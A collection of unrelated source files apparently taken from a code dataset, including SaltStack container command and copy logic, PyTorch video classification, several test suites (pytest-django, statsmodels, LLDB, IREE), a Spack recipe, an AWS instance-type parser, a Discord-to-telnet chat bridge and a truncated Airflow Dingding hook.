full_cmd += " -n {0} -- {1}".format(pipes.quote(name), cmd)
elif exec_driver == "nsenter":
pid = __salt__["{0}.pid".format(container_type)](name)
full_cmd = "nsenter --target {0} --mount --uts --ipc --net --pid -- ".format(
pid
)
if keep_env is not True:
full_cmd += "env -i "
if "PATH" not in to_keep:
full_cmd += "{0} ".format(PATH)
full_cmd += " ".join(
[
"{0}={1}".format(x, pipes.quote(os.environ[x]))
for x in to_keep
if x in os.environ
]
)
full_cmd += " {0}".format(cmd)
elif exec_driver == "docker-exec":
# We're using docker exec on the CLI as opposed to via docker-py, since
# the Docker API doesn't return stdout and stderr separately.
full_cmd = "docker exec "
if stdin:
full_cmd += "-i "
full_cmd += "{0} ".format(name)
if keep_env is not True:
full_cmd += "env -i "
if "PATH" not in to_keep:
full_cmd += "{0} ".format(PATH)
full_cmd += " ".join(
[
"{0}={1}".format(x, pipes.quote(os.environ[x]))
for x in to_keep
if x in os.environ
]
)
full_cmd += " {0}".format(cmd)
if not use_vt:
ret = __salt__[cmd_func](
full_cmd,
stdin=stdin,
python_shell=python_shell,
output_loglevel=output_loglevel,
ignore_retcode=ignore_retcode,
)
else:
stdout, stderr = "", ""
proc = salt.utils.vt.Terminal(
full_cmd,
shell=python_shell,
log_stdin_level="quiet" if output_loglevel == "quiet" else "info",
log_stdout_level=output_loglevel,
log_stderr_level=output_loglevel,
log_stdout=True,
log_stderr=True,
stream_stdout=False,
stream_stderr=False,
)
# Consume output
try:
while proc.has_unread_data:
try:
cstdout, cstderr = proc.recv()
if cstdout:
stdout += cstdout
if cstderr:
if output is None:
stdout += cstderr
else:
stderr += cstderr
time.sleep(0.5)
except KeyboardInterrupt:
break
ret = (
stdout
if output is None
else {
"retcode": proc.exitstatus,
"pid": 2,
"stdout": stdout,
"stderr": stderr,
}
)
except salt.utils.vt.TerminalException:
trace = traceback.format_exc()
log.error(trace)
ret = (
stdout
if output is None
else {"retcode": 127, "pid": 2, "stdout": stdout, "stderr": stderr}
)
finally:
proc.terminate()
return ret
@_validate
def copy_to(
name,
source,
dest,
container_type=None,
path=None,
exec_driver=None,
overwrite=False,
makedirs=False,
):
"""
Common logic for copying files to containers
path
path to the container parent (for LXC only)
default: /var/lib/lxc (system default)
CLI Example:
.. code-block:: bash
salt myminion container_resource.copy_to mycontainer /local/file/path /container/file/path container_type=docker exec_driver=nsenter
"""
# Get the appropriate functions
state = __salt__["{0}.state".format(container_type)]
def run_all(*args, **akwargs):
akwargs = copy.deepcopy(akwargs)
if container_type in ["lxc"] and "path" not in akwargs:
akwargs["path"] = path
return __salt__["{0}.run_all".format(container_type)](*args, **akwargs)
state_kwargs = {}
cmd_kwargs = {"ignore_retcode": True}
if container_type in ["lxc"]:
cmd_kwargs["path"] = path
state_kwargs["path"] = path
def _state(name):
if state_kwargs:
return state(name, **state_kwargs)
else:
return state(name)
c_state = _state(name)
if c_state != "running":
raise CommandExecutionError("Container '{0}' is not running".format(name))
local_file = cache_file(source)
source_dir, source_name = os.path.split(local_file)
# Source file sanity checks
if not os.path.isabs(local_file):
raise SaltInvocationError("Source path must be absolute")
elif not os.path.exists(local_file):
raise SaltInvocationError("Source file {0} does not exist".format(local_file))
elif not os.path.isfile(local_file):
raise SaltInvocationError("Source must be a regular file")
# Destination file sanity checks
if not os.path.isabs(dest):
raise SaltInvocationError("Destination path must be absolute")
if (
run_all(name, "test -d {0}".format(pipes.quote(dest)), **cmd_kwargs)["retcode"]
== 0
):
# Destination is a directory, full path to dest file will include the
# basename of the source file.
dest = os.path.join(dest, source_name)
else:
# Destination was not a directory. We will check to see if the parent
# dir is a directory, and then (if makedirs=True) attempt to create the
# parent directory.
dest_dir, dest_name = os.path.split(dest)
if (
run_all(name, "test -d {0}".format(pipes.quote(dest_dir)), **cmd_kwargs)[
"retcode"
]
!= 0
):
if makedirs:
result = run_all(
name, "mkdir -p {0}".format(pipes.quote(dest_dir)), **cmd_kwargs
)
if result["retcode"] != 0:
error = (
"Unable to create destination directory {0} in "
"container '{1}'".format(dest_dir, name)
)
if result["stderr"]:
error += ": {0}".format(result["stderr"])
raise CommandExecutionError(error)
else:
raise SaltInvocationError(
"Directory {0} does not exist on {1} container '{2}'".format(
dest_dir, container_type, name
)
)
if (
not overwrite
and run_all(name, "test -e {0}".format(pipes.quote(dest)), **cmd_kwargs)[
"retcode"
]
== 0
):
raise CommandExecutionError(
"Destination path {0} already exists. Use overwrite=True to "
"overwrite it".format(dest)
)
# Before we try to replace the file, compare checksums.
source_md5 = __salt__["file.get_sum"](local_file, "md5")
if source_md5 == _get_md5(name, dest, run_all):
log.debug('%s and %s:%s are the same file, skipping copy', source, name, dest)
return True
log.debug('Copying %s to %s container \'%s\' as %s',
source, container_type, name, dest)
# Using cat here instead of opening the file, reading it into memory,
# and passing it as stdin to run(). This will keep down memory
# usage for the minion and make the operation run quicker.
if exec_driver == "lxc-attach":
lxcattach = "lxc-attach"
if path:
lxcattach += " -P {0}".format(pipes.quote(path))
copy_cmd = (
'cat "{0}" | {4} --clear-env --set-var {1} -n {2} -- '
'tee "{3}"'.format(local_file, PATH, name, dest, lxcattach)
)
elif exec_driver == "nsenter":
pid = __salt__["{0}.pid".format(container_type)](name)
copy_cmd = 'cat "{0}" | {1} env -i {2} tee "{3}"'.format(
local_file, _nsenter(pid), PATH, dest
)
elif exec_driver == "docker-exec":
copy_cmd = 'cat "{0}" | docker exec -i {1} env -i {2} tee "{3}"'.format(
local_file, name, PATH, dest
)
__salt__["cmd.run"](copy_cmd, python_shell=True, output_loglevel="quiet")
return source_md5 == _get_md5(name, dest, run_all)
|
the-stack_0_25305
|
import torch
from torch.autograd import Variable
from dataset import Video
from spatial_transforms import (Compose, Normalize, Scale, CenterCrop, ToTensor)
from temporal_transforms import LoopPadding
def classify_video(video_dir, video_name, class_names, model, opt, downrate):
assert opt.mode in ['score', 'feature']
spatial_transform = Compose([Scale(opt.sample_size),
CenterCrop(opt.sample_size),
ToTensor(),
Normalize(opt.mean, [1, 1, 1])])
temporal_transform = LoopPadding(opt.sample_duration)
data = Video(video_dir, spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
sample_duration=opt.sample_duration, down_rate=downrate)
data_loader = torch.utils.data.DataLoader(data, batch_size=opt.batch_size,
shuffle=False, num_workers=opt.n_threads, pin_memory=True)
video_outputs = []
video_segments = []
for i, (inputs, segments) in enumerate(data_loader):
inputs = Variable(inputs, volatile=True)
# torch: set the input volatile=True if only doing inference not back-propagation
outputs = model(inputs)
video_outputs.append(outputs.cpu().data)
video_segments.append(segments)
video_outputs = torch.cat(video_outputs)
video_segments = torch.cat(video_segments)
results = {
'video': video_name,
'clips': []
}
_, max_indices = video_outputs.max(dim=1)
for i in range(video_outputs.size(0)):
clip_results = {
'segment': video_segments[i].tolist(),
}
if opt.mode == 'score':
clip_results['label'] = class_names[max_indices[i]]
clip_results['scores'] = video_outputs[i].tolist()
elif opt.mode == 'feature':
clip_results['features'] = video_outputs[i].tolist()
results['clips'].append(clip_results)
return results
|
the-stack_0_25306
|
import pytest
@pytest.fixture
def no_ds(monkeypatch) -> None:
"""Ensure DJANGO_SETTINGS_MODULE is unset"""
monkeypatch.delenv("DJANGO_SETTINGS_MODULE")
pytestmark = pytest.mark.usefixtures("no_ds")
def test_no_ds(testdir) -> None:
testdir.makepyfile(
"""
import os
def test_env():
assert 'DJANGO_SETTINGS_MODULE' not in os.environ
def test_cfg(pytestconfig):
assert pytestconfig.option.ds is None
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
def test_database(testdir) -> None:
testdir.makepyfile(
"""
import pytest
@pytest.mark.django_db
def test_mark():
assert 0
@pytest.mark.django_db(transaction=True)
def test_mark_trans():
assert 0
def test_db(db):
assert 0
def test_transactional_db(transactional_db):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*4 skipped*"])
def test_client(testdir) -> None:
testdir.makepyfile(
"""
def test_client(client):
assert 0
def test_admin_client(admin_client):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*2 skipped*"])
def test_rf(testdir) -> None:
testdir.makepyfile(
"""
def test_rf(rf):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
def test_settings(testdir) -> None:
testdir.makepyfile(
"""
def test_settings(settings):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
def test_live_server(testdir) -> None:
testdir.makepyfile(
"""
def test_live_server(live_server):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
def test_urls_mark(testdir) -> None:
testdir.makepyfile(
"""
import pytest
@pytest.mark.urls('foo.bar')
def test_urls():
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
|
the-stack_0_25308
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class RPcamethods(RPackage):
"""A collection of PCA methods.
Provides Bayesian PCA, Probabilistic PCA, Nipals PCA, Inverse Non-Linear
PCA and the conventional SVD PCA. A cluster based method for missing
value estimation is included for comparison. BPCA, PPCA and NipalsPCA
may be used to perform PCA on incomplete data as well as for accurate
missing value estimation. A set of methods for printing and plotting the
results is also provided. All PCA methods make use of the same data
structure (pcaRes) to provide a common interface to the PCA results.
Initiated at the Max-Planck Institute for Molecular Plant Physiology,
Golm, Germany."""
bioc = "pcaMethods"
version('1.88.0', commit='02fb58d6fe35579b86fb2ebd2eaf92e6b53444d2')
version('1.86.0', commit='9419cfa18c18dfbd1e1194127fd120ab456c3657')
version('1.82.0', commit='d500b3363308f1f8ca70625c5cd10cce59b27641')
version('1.76.0', commit='5db995330ced37dfd5ddad6ad1d90b4815d3127a')
version('1.74.0', commit='1b8f0a5cdfe3664119d0d7e926a2e0fe7320133c')
version('1.72.0', commit='1bb8c7d056645e62ee5179f6bb30b6594ebf3bfd')
version('1.70.0', commit='3368fad48ea930775505fd26e4179d7714d633d8')
version('1.68.0', commit='c8d7c93dcaf7ef728f3d089ae5d55771b320bdab')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-biocgenerics', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-mass', type=('build', 'run'))
|
the-stack_0_25309
|
'''
Unit tests table.py.
:see: http://docs.python.org/lib/minimal-example.html for an intro to unittest
:see: http://agiletesting.blogspot.com/2005/01/python-unit-testing-part-1-unittest.html
:see: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/305292
'''
from __future__ import absolute_import
import unittest
try:
import numpy as np
has_numpy = True
except ImportError:
has_numpy = False
__docformat__ = "restructuredtext en"
from statsmodels.iolib.table import Cell, Row, SimpleTable
from statsmodels.iolib.table import default_latex_fmt
from statsmodels.iolib.table import default_html_fmt
ltx_fmt1 = default_latex_fmt.copy()
html_fmt1 = default_html_fmt.copy()
txt_fmt1 = dict(
data_fmts = ['%0.2f', '%d'],
empty_cell = ' ',
colwidths = 1,
colsep=' * ',
row_pre = '* ',
row_post = ' *',
table_dec_above='*',
table_dec_below='*',
header_dec_below='*',
header_fmt = '%s',
stub_fmt = '%s',
title_align='r',
header_align = 'r',
data_aligns = "r",
stubs_align = "l",
fmt = 'txt'
)
cell0data = 0.0000
cell1data = 1
row0data = [cell0data, cell1data]
row1data = [2, 3.333]
table1data = [ row0data, row1data ]
test1stubs = ('stub1', 'stub2')
test1header = ('header1', 'header2')
#test1header = ('header1\nheader1a', 'header2\nheader2a')
tbl = SimpleTable(table1data, test1header, test1stubs,
txt_fmt=txt_fmt1, ltx_fmt=ltx_fmt1, html_fmt=html_fmt1)
def custom_labeller(cell):
if cell.data is np.nan:
return 'missing'
class test_Cell(unittest.TestCase):
def test_celldata(self):
celldata = cell0data, cell1data, row1data[0], row1data[1]
cells = [Cell(datum, datatype=i%2) for i, datum in enumerate(celldata)]
for cell, datum in zip(cells, celldata):
self.assertEqual(cell.data, datum)
class test_SimpleTable(unittest.TestCase):
def test_txt_fmt1(self):
"""Limited test of custom txt_fmt"""
desired = """
*****************************
* * header1 * header2 *
*****************************
* stub1 * 0.00 * 1 *
* stub2 * 2.00 * 3 *
*****************************
"""
actual = '\n%s\n' % tbl.as_text()
#print('actual')
#print(actual)
#print('desired')
#print(desired)
self.assertEqual(actual, desired)
def test_ltx_fmt1(self):
"""Limited test of custom ltx_fmt"""
desired = r"""
\begin{tabular}{lcc}
\toprule
& \textbf{header1} & \textbf{header2} \\
\midrule
\textbf{stub1} & 0.0 & 1 \\
\textbf{stub2} & 2 & 3.333 \\
\bottomrule
\end{tabular}
"""
actual = '\n%s\n' % tbl.as_latex_tabular()
#print(actual)
#print(desired)
self.assertEqual(actual, desired)
def test_html_fmt1(self):
"""Limited test of custom html_fmt"""
desired = """
<table class="simpletable">
<tr>
<td></td> <th>header1</th> <th>header2</th>
</tr>
<tr>
<th>stub1</th> <td>0.0</td> <td>1</td>
</tr>
<tr>
<th>stub2</th> <td>2</td> <td>3.333</td>
</tr>
</table>
"""
#the previous has significant trailing whitespace that got removed
#desired = '''\n<table class="simpletable">\n<tr>\n <td></td> <th>header1</th> <th>header2</th>\n</tr>\n<tr>\n <th>stub1</th> <td>0.0</td> <td>1</td> \n</tr>\n<tr>\n <th>stub2</th> <td>2</td> <td>3.333</td> \n</tr>\n</table>\n'''
actual = '\n%s\n' % tbl.as_html()
actual = '\n'.join((line.rstrip() for line in actual.split('\n')))
#print(actual)
#print(desired)
#print len(actual), len(desired)
self.assertEqual(actual, desired)
def test_customlabel(self):
"""Limited test of custom custom labeling"""
if has_numpy:
tbl = SimpleTable(table1data, test1header, test1stubs, txt_fmt=txt_fmt1)
tbl[1][1].data = np.nan
tbl.label_cells(custom_labeller)
#print([[c.datatype for c in row] for row in tbl])
desired = """
*****************************
* * header1 * header2 *
*****************************
* stub1 * -- * 1 *
* stub2 * 2.00 * 3 *
*****************************
"""
actual = '\n%s\n' % tbl.as_text(missing='--')
#print(actual)
#print(desired)
self.assertEqual(actual, desired)
if __name__=="__main__":
unittest.main()
|
the-stack_0_25311
|
"""
Exercise Python 080:
Create a program where the user can enter five numeric values
and insert each one into a list at its correct sorted position (without using sort()).
At the end, show the sorted list on the screen.
"""
lista = []
count = 0
while True:
count += 1
    n = int(input('Enter a value: '))
if n not in lista:
if count == 1 or n > lista[-1]:
lista.append(n)
            print('Added at the end of the list.')
else:
indice = 0
while indice < len(lista):
if n <= lista[indice]:
lista.insert(indice, n)
                    print('Added at position {} of the list.'.format(indice))
break
indice += 1
else:
print('Duplicate')
    leave = str(input('Do you want to leave? [y/n] ')).upper()
if leave in 'Y':
break
print(lista)
|
the-stack_0_25313
|
# -*- coding: utf-8 -*-
import sys
MODULE_LIST = ["ednet.info",
"ednet.util",
"ednet.sequentialguid",
"ednet.appsettings",
"ednet.ad",
"ednet.w2py",
"ednet.canvas",
"ednet.student",
"ednet.faculty"
]
def ReloadModules():
global MODULE_LIST
# Web2py adds this prefix to modules
prefix = "applications.smc.modules."
msg = ""
if sys.version_info[0] == 2:
# Python 2
# msg = "Detected Python2:"
for m in MODULE_LIST:
msg += "-- Reload: " + m + " "
module_name = prefix + m
if module_name in sys.modules:
try:
#reload(sys.modules[module_name])
pass
print("Python2 detected - no longer supported!")
except Exception as ex:
msg += str(ex)
else:
msg += "<- " + m + " not loaded yet"
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:
# Python 3 < 3.4
msg = "Detected < Python 3.4:"
import imp
for m in MODULE_LIST:
msg += " - " + m
imp.reload(m)
elif sys.version_info[0] == 3 and sys.version_info[1] > 3:
# Python 3 > 3.3
msg = "Detected > Python 3.3: "
import importlib
for m in MODULE_LIST:
msg += " - " + m
m_obj = sys.modules[m]
importlib.reload(m_obj)
else:
msg = "Unknown Python?!?!? " + str(sys.version_info)
return msg
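# Hedged usage sketch: after editing any module listed in MODULE_LIST, calling
# ReloadModules() refreshes the cached modules and returns a summary string that
# can be logged or displayed.
if __name__ == '__main__':
    print(ReloadModules())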
|
the-stack_0_25314
|
"""
Test some more expression commands.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ExprCommands2TestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break for main.c.
self.line = line_number(
'main.cpp',
'// Please test many expressions while stopped at this line:')
def test_more_expr_commands(self):
"""Test some more expression commands."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=False)
self.runCmd("run", RUN_SUCCEEDED)
# Does static casting work?
self.expect("expression (int*)argv",
startstr="(int *) $0 = 0x")
# (int *) $0 = 0x00007fff5fbff258
# Do return values containing the contents of expression locals work?
self.expect("expression int i = 5; i",
startstr="(int) $1 = 5")
# (int) $2 = 5
self.expect("expression $1 + 1",
startstr="(int) $2 = 6")
# (int) $3 = 6
# Do return values containing the results of static expressions work?
self.expect("expression 20 + 3",
startstr="(int) $3 = 23")
# (int) $4 = 5
self.expect("expression $3 + 1",
startstr="(int) $4 = 24")
# (int) $5 = 6
@skipIfLinux
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr24489")
def test_expr_symbols(self):
"""Test symbols."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=False)
self.runCmd("run", RUN_SUCCEEDED)
# Do anonymous symbols work?
self.expect("expression ((char**)environ)[0]",
startstr="(char *) $0 = 0x")
# (char *) $1 = 0x00007fff5fbff298 "Apple_PubSub_Socket_Render=/tmp/launch-7AEsUD/Render"
|
the-stack_0_25318
|
import asyncio
import os
import queue
import random
import socket
import sys
import telnetlib
import threading
import discord
class socketserver(threading.Thread):
"""Socket server, starts a server on a fixed port, writes all recived messages to stdin and sends new queue items back"""
def __init__(self, inqueue, outqueue, args=(), kwargs=None):
threading.Thread.__init__(self, args=(), kwargs=None)
self.inqueue = inqueue
self.outqueue = outqueue
self.daemon = True
self.HOST = ""
self.PORT = random.randint(50000, 50100)
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.bind((self.HOST, self.PORT))
def run(self):
self.soc.listen(1)
conn, addr = self.soc.accept()
if addr[0] != "127.0.0.1":
return
conn.setblocking(False)
while True:
try:
data = conn.recv(1024)
except BlockingIOError:
data = b""
if data:
if data == b"/kill\n":
break
self.outqueue.put(data, False)
try:
val = self.inqueue.get(block=False)
conn.sendall(val.encode())
except queue.Empty:
pass # no data avalable
# Threads:
# Discord.py < runs discord.py
# Telnet < accepts input
# socket server < runs a socket that interfaces discord.py and telnet
# autologout < when the discord bot is blocking, this detects the server shutting down and logs out the bot
def telnetThread(port):
print("telnet connect")
i = telnetlib.Telnet("localhost", port)
print("done")
print("\n")
try:
i.mt_interact()
except KeyboardInterrupt:
pass
i.close()
discordkey = os.environ.get("dkey", None)
if discordkey is None:
print("Set the environ dkey to your discord api key for discord.py")
sys.exit(1)
channelid = os.environ.get("channelid", None)
if channelid is None:
print(
"Set the environ channelid to the channel id of the discord channel you want to talk in"
)
sys.exit(1)
# do discord.py stuff
def getmemberfromid(client, id):
return discord.utils.get(client.get_all_members(), id=id)
def getincoming():
mes = []
while True:
try:
mes.append(oq.get(False))
except queue.Empty:
break
return mes
class MyClient(discord.Client):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# create the background task and run it in the background
self.bg_task = self.loop.create_task(self.autorestart())
async def on_ready(self):
self.print("Logged in as")
self.print(self.user.name)
self.print(self.user.id)
self.print("------")
thr.start()
async def on_message(self, message):
if message.author != message.guild.get_member(self.user.id):
mes = message.clean_content
self.print("{}:{}".format(message.author.display_name, mes))
def print(self, mes):
iq.put(str(mes) + "\n")
async def autorestart(self):
while not self.is_closed():
try:
await self.message_sender()
except:
print("Error in message_sender, restarting...")
async def message_sender(self):
global channelid
await self.wait_until_ready()
channel = self.get_channel(int(channelid))
self.print("Chatting in {}".format(channel.name))
while not self.is_closed():
newmes = getincoming()
for mes in newmes:
mes = mes.decode()
if mes.startswith("/"):
mes = mes.split("/")[1]
if mes.startswith("channel"):
newchannelid = mes.split(" ")[1]
self.print("Switching to channel...")
channel = self.get_channel(int(newchannelid))
channelid = newchannelid
self.print("Chatting in {}".format(channel.name))
elif mes.startswith("list-channel"):
serverid = mes.split(" ")[1]
dserver = self.get_guild(int(serverid))
self.print("Channels in server {}".format(
dserver.name))
# print(dserver.channels)
for chanel in dserver.channels:
if isinstance(chanel, discord.TextChannel):
self.print("{}:{}".format(
chanel.name, chanel.id))
elif mes.startswith("list-servers") or mes.startswith(
"list-guilds"):
self.print("Guilds/Servers:")
for guild in self.guilds:
self.print("{}:{}".format(guild.name, guild.id))
elif mes.startswith("isbot"):
self.print("You are{} a bot".format({
False: " not",
True: ""
}[self.user.bot]))
elif mes.startswith("userinfo"):
id = mes.split(" ")[1]
user = getmemberfromid(self, int(id))
if user is None:
self.print("No user found")
else:
self.print(
"{}#{}\nID:{}\nBot:{}\nCreated on:{}".format(
user.name,
user.discriminator,
user.id,
user.bot,
user.created_at,
))
self.print("String to mention:{}".format(
user.mention))
try:
if not user.bot:
profile = await user.profile()
else:
profile = None
iq.put("User is bot so ")
except (discord.HTTPException, discord.Forbidden):
profile = None
if profile is None:
self.print("Unable to grab profile")
else:
self.print("Has nitro:{}".format(
profile.nitro))
if profile.nitro:
self.print("Nitro since:{}".format(
profile.premium_since))
self.print("Hypesquad:{}".format(
profile.hypesquad))
if profile.hypesquad:
self.print("Houses:{}".format(
profile.hypesquad_houses))
else:
self.print("Invalid Command!")
else:
await channel.send(mes)
await asyncio.sleep(1) # task runs every 60 seconds
iq = queue.Queue()
oq = queue.Queue()
server = socketserver(iq, oq)
server.start()
thr = threading.Thread(target=telnetThread, args=(server.PORT, ), daemon=True)
def autologout(server, dclient):
server.join()
print("Logging Out")
loop = dclient.loop
dclient.logouttask = loop.create_task(dclient.logout())
i = False
while not i:
i = dclient.is_closed()
client = MyClient()
autolog = threading.Thread(target=autologout,
args=(server, client),
daemon=False)
autolog.start()
client.run(discordkey)
autolog.join()
|
the-stack_0_25320
|
"""
AWSInstanceType
===============
This parser simply reads the output of command
``curl http://169.254.169.254/latest/meta-data/instance-type``,
which is used to check the type of the AWS instance on the host.
"""
from insights.parsers import SkipException, ParseException
from insights import parser, CommandParser
from insights.specs import Specs
@parser(Specs.aws_instance_type)
class AWSInstanceType(CommandParser):
"""
Class for parsing the AWS Instance type returned by command
``curl http://169.254.169.254/latest/meta-data/instance-type``
Typical output of this command is::
r3.xlarge
Raises:
SkipException: When content is empty or no parse-able content.
ParseException: When type cannot be recognized.
Attributes:
type (str): The name of AWS instance type in all uppercase letters. E.g. R3, R4, R5, or X1.
raw (str): The fully type string returned by the ``curl`` command.
Examples:
>>> aws_inst.type
'R3'
>>> aws_inst.raw
'r3.xlarge'
"""
def parse_content(self, content):
if (not content or len(content) > 1 or 'curl: ' in content[0]):
raise SkipException()
self.raw = self.type = None
if '.' in content[0]:
self.raw = content[0].strip()
self.type = self.raw.split('.')[0].upper()
if not self.type:
raise ParseException('Unrecognized type: "{0}"', content[0])
def __repr__(self):
return "<aws_type: {t}, raw: {r}>".format(t=self.type, r=self.raw)
|
the-stack_0_25321
|
# Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl import app
import numpy as np
from pyiree.tf.support import tf_test_utils
from pyiree.tf.support import tf_utils
import tensorflow.compat.v2 as tf
class DepthConv2dModule(tf.Module):
# TODO(ataei): Add dilation and strided tests.
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 2, 2, 3], tf.float32),
])
def conv2d_2452x2423_valid(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 1, 1, 1],
"VALID",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 4, 2, 3], tf.float32),
])
def conv2d_2452x2423_same(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 1, 1, 1],
"SAME",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 4, 2, 3], tf.float32),
])
def conv2d_2452x2423_valid_stride_2(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 2, 2, 1],
"VALID",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 4, 2, 3], tf.float32),
])
def conv2d_2452x2423_same_stride_2(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 2, 2, 1],
"SAME",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 4], tf.float32),
tf.TensorSpec([2, 4, 4, 1], tf.float32),
])
def conv2d_2453x2441_same_stride_1(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 1, 1, 1],
"SAME",
name="result")
class ConvTest(tf_test_utils.TracedModuleTestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._modules = tf_test_utils.compile_tf_module(DepthConv2dModule)
# yapf: disable
def test_batched_feature_unpadded(self):
def batched_feature_unpadded(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 2, 2, 3])
module.conv2d_2452x2423_valid(i, k)
self.compare_backends(batched_feature_unpadded, self._modules)
def test_batched_feature_unpadded_same(self):
def batched_feature_unpadded_same(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 4, 2, 3])
module.conv2d_2452x2423_same(i, k)
self.compare_backends(batched_feature_unpadded_same, self._modules)
def test_batched_feature_unpadded_same_stride_2(self):
def batched_feature_unpadded_same_stride_2(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 4, 2, 3])
module.conv2d_2452x2423_valid_stride_2(i, k)
self.compare_backends(batched_feature_unpadded_same_stride_2,
self._modules)
def test_batched_feature_padded_same_stride_2(self):
def batched_feature_padded_same_stride_2(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 4, 2, 3])
module.conv2d_2452x2423_same_stride_2(i, k)
self.compare_backends(batched_feature_padded_same_stride_2, self._modules)
def test_batched_feature_padded_same_stride_1_output_1(self):
def batched_feature_padded_same_stride_1_output_1(module):
i = tf_utils.ndarange([2, 4, 5, 4])
k = tf_utils.ndarange([2, 4, 4, 1])
module.conv2d_2453x2441_same_stride_1(i, k)
self.compare_backends(batched_feature_padded_same_stride_1_output_1,
self._modules)
# yapf: enable
def main(argv):
del argv # Unused
if hasattr(tf, 'enable_v2_behavior'):
tf.enable_v2_behavior()
tf.test.main()
if __name__ == '__main__':
app.run(main)
|
the-stack_0_25322
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from typing import List, Optional, Union
import requests
from requests import Session
from airflow.exceptions import AirflowException
from airflow.providers.http.hooks.http import HttpHook
class DingdingHook(HttpHook):
"""
This hook allows you send Dingding message using Dingding custom bot.
Get Dingding token from conn_id.password. And prefer set domain to
conn_id.host, if not will use default ``https://oapi.dingtalk.com``.
For more detail message in
`Dingding custom bot <https://open-doc.dingtalk.com/microapp/serverapi2/qf2nxq>`_
:param dingding_conn_id: The name of the Dingding connection to use
:type dingding_conn_id: str
:param message_type: Message type you want to send to Dingding, support five type so far
including text, link, markdown, actionCard, feedCard
:type message_type: str
:param message: The message send to Dingding chat group
:type message: str or dict
:param at_mobiles: Remind specific users with this message
:type at_mobiles: list[str]
:param at_all: Remind all people in group or not. If True, will overwrite ``at_mobiles``
:type at_all: bool
"""
conn_name_attr = 'dingding_conn_id'
default_conn_name = 'dingding_default'
conn_type = 'dingding'
hook_name = 'Dingding'
def __init__(
self,
dingding_conn_id='dingding_default',
message_type: str = 'text',
message: Optional[Union[str, dict]] = None,
at_mobiles: Optional[List[str]] = None,
at_all: bool = False,
*args,
**kwargs,
) -> None:
super().__init__(http_conn_id=dingding_conn_id, *args, **kwargs) # type: ignore[misc]
self.message_type = message_type
self.message = message
self.at_mobiles = at_mobiles
self.at_all = at_all
def _get_endpoint(self) -> str:
"""Get Dingding endpoint for sending message."""
conn = self.get_connection(self.http_conn_id)
token = conn.password
if not token:
raise AirflowException(
